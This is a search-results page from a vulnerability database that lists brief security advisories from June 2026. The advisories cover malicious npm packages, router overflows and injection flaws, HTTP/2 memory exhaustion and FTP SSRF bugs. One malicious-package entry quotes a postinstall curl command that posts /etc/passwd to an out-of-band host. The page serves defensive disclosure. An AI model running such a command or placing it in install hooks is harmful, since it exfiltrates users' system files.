Lucene search
K

2778 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 5:18 p.m.15 views

Malicious code in @shell-cabinet/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/09 5:16 p.m.10 views

MAL-2026-5425 Malicious code in @oplus/obus-web-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 956ecc19633177f7ef9b458e6407ffbba6c8366688249c07bfd7f3c8e85c17a9 On npm install, the package's scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory...

5.4AI score
Exploits0References1
EUVD
EUVD
added 2026/06/09 5:5 p.m.13 views

EUVD-2026-35588

Uncontrolled resource consumption in HTTP/2 allows an unauthorized attacker to deny service over a network...

7.5CVSS5.4AI score0.48438EPSS
Exploits2References1
IBM Security Bulletins
IBM Security Bulletins
added 2026/06/09 8:4 a.m.10 views

Security Bulletin: IBM App Connect Enterprise is vulnerable to FTP command injection and denial of service due to Node.js module basic-ftp ( CVE-2026-39983 & CVE-2026-41324 )

Summary IBM App Connect Enterprise Connector Discovery and OpenAPI Editor, IBM App Connect Enterprise Discovery Connectors and IBM App Connect Enterprise runtime are vulnerable to FTP command injection and denial of service due to Node.js module basic-ftp. Vulnerability Details CVEID:CVE-2026-399...

8.6CVSS5.6AI score0.02185EPSS
Exploits2Affected Software1
CNNVD
CNNVD
added 2026/06/09 12:0 a.m.14 views

Tenda W15E 安全漏洞

The Tenda W15E is a wireless router produced by the Chinese company Tenda. The version 15.11.0.10 of the Tenda W15E contains a security vulnerability. This vulnerability stems from a buffer overflow in the picCropName parameter of the formCropAndSetWewifiPic function, which could allow attackers ...

7.5CVSS5.8AI score0.00309EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/06/08 2:12 p.m.47 views

CVE-2026-43973 gun HTTP/1.1 response buffer has no size limit allowing server-controlled memory exhaustion

Uncontrolled Resource Consumption vulnerability in ninenines gun gunhttp module allows a malicious server to exhaust client memory via unbounded HTTP/1.1 response buffering. In gunhttp:handle/5, three clauses accumulate incoming TCP data into the connection's buffer field using binary concatenati...

8.7CVSS0.00381EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2026/06/08 12:0 a.m.17 views

PT-2026-47301

Name of the Vulnerable Software and Affected Versions Routinator affected versions not specified Description Routinator exits upon encountering any error while accepting incoming HTTP or RTR connections. This includes recoverable errors, such as exhausting available file descriptors. An attacker...

8.7CVSS5.5AI score0.00333EPSS
Exploits0References4
CNNVD
CNNVD
added 2026/06/08 12:0 a.m.7 views

TOTOLINK AC1200 T8 安全漏洞

The TOTOLINK AC1200 T8 is an AC1200 dual-band Mesh wireless router produced by TOTOLINK Corporation. Version 4.1.5cu.8611 of the TOTOLINK AC1200 T8 contains a security vulnerability. This vulnerability stems from incorrect operations in the vsftpd component’s configuration file /etc/vsftpd.conf,...

5.3CVSS5AI score0.00215EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/06/08 12:0 a.m.12 views

Apache HTTP Server 跨站脚本漏洞

Apache HTTP Server is an open-source web server developed by the Apache Foundation in the United States. This server is known for its speed, reliability, and ability to be expanded through simple APIs. Versions of Apache HTTP Server 2.4.67 and earlier had a cross-site scripting vulnerability. Thi...

6.1CVSS4.9AI score0.00504EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/06/07 12:0 a.m.11 views

GL.iNet GL-MT3000 命令注入漏洞

GL.iNet GL-MT3000 is a portable travel router from the company GL.iNet, which supports Wi-Fi 6 and VPN functions. Version 4.4.5 of GL.iNet GL-MT3000 has a command injection vulnerability. This vulnerability stems from an incorrect operation with the parameter “mediadir” in the function snprintf o...

7.5CVSS7.2AI score0.02027EPSS
Exploits1References6
OSV
OSV
added 2026/06/06 10:16 a.m.6 views

UBUNTU-CVE-2026-10725

Protocol::HTTP2 versions before 1.13 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory the "HTTP/2 bomb". The headersdecode method materialises a full key+value copy per indexe...

7.5CVSS5.4AI score0.00414EPSS
Exploits0References7
EUVD
EUVD
added 2026/06/06 9:14 a.m.12 views

EUVD-2026-34964

Protocol::HTTP2 versions through 1.12 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory the "HTTP/2 bomb". The headersdecode method materialises a full key+value copy per index...

5.7AI score0.00414EPSS
Exploits0References3
Debian CVE
Debian CVE
added 2026/06/06 9:14 a.m.12 views

CVE-2026-10725

Protocol::HTTP2 versions before 1.13 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory the "HTTP/2 bomb". The headersdecode method materialises a full key+value copy per indexe...

7.5CVSS5.7AI score0.00414EPSS
Exploits0
CNNVD
CNNVD
added 2026/06/06 12:0 a.m.8 views

Protocol::HTTP2 安全漏洞

Protocol::HTTP2 is a Ruby protocol library developed by CROX’s individual developers, which implements functions for encoding/decoding HTTP/2 protocols, frame handling, and connection management. Versions of Protocol::HTTP2 prior to 1.12 contained security vulnerabilities. These vulnerabilities...

7.5CVSS5.3AI score0.00414EPSS
Exploits0References4
RedhatCVE
RedhatCVE
added 2026/06/05 7:38 p.m.11 views

CVE-2026-34288

Vulnerability in the Oracle Identity Manager Connector product of Oracle Fusion Middleware component: Core. The supported version that is affected is 12.2.1.4.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Identity Manager...

5.9CVSS7.4AI score0.00261EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:20 p.m.13 views

CVE-2026-41235

Froxlor is open source server administration software. Version 2.3.6 lets administrators configure system.availableshells as the approved shell list that customers may assign to FTP users. However, the server-side FTP account handlers do not enforce that whitelist when processing add or edit...

9.4CVSS5.5AI score0.00227EPSS
Exploits0References1
OSV
OSV
added 2026/06/05 3:48 p.m.11 views

OESA-2026-2570 gvfs security update

Gvfs is a userspace virtual filesystem implementation for GIO a library available in GLib. It comes with a set of backends, including trash support, SFTP, SMB, HTTP, DAV, and many others. Gvfs also contains modules for GIO that implement volume monitors and persistent metadata storage. Security...

4.3CVSS8.4AI score0.0036EPSS
Exploits2References2
OSV
OSV
added 2026/06/05 10:55 a.m.11 views

BIT-PYTHON-MIN-2026-8328 FTP PASV SSRF, ftpcp() does not use actual peer address, trusts server-supplied PASV host address

The ftpcp function in Lib/ftplib.py was not updated when CVE-2021-4189 was fixed. While makepasv was patched to replace server-supplied PASV host addresses with the actual peer address getpeername0, ftpcp still calls parse227 directly and passes the raw attacker-controllable IP address and port t...

5.9CVSS5.8AI score0.00476EPSS
Exploits0References11
OSV
OSV
added 2026/06/05 10:55 a.m.8 views

BIT-PYTHON-2026-8328 FTP PASV SSRF, ftpcp() does not use actual peer address, trusts server-supplied PASV host address

The ftpcp function in Lib/ftplib.py was not updated when CVE-2021-4189 was fixed. While makepasv was patched to replace server-supplied PASV host addresses with the actual peer address getpeername0, ftpcp still calls parse227 directly and passes the raw attacker-controllable IP address and port t...

5.9CVSS5.8AI score0.00476EPSS
Exploits0References11
OSV
OSV
added 2026/06/05 10:47 a.m.16 views

BIT-LIBPYTHON-2026-8328 FTP PASV SSRF, ftpcp() does not use actual peer address, trusts server-supplied PASV host address

The ftpcp function in Lib/ftplib.py was not updated when CVE-2021-4189 was fixed. While makepasv was patched to replace server-supplied PASV host addresses with the actual peer address getpeername0, ftpcp still calls parse227 directly and passes the raw attacker-controllable IP address and port t...

5.9CVSS5.8AI score0.00476EPSS
Exploits0References11
Rows per page
Query Builder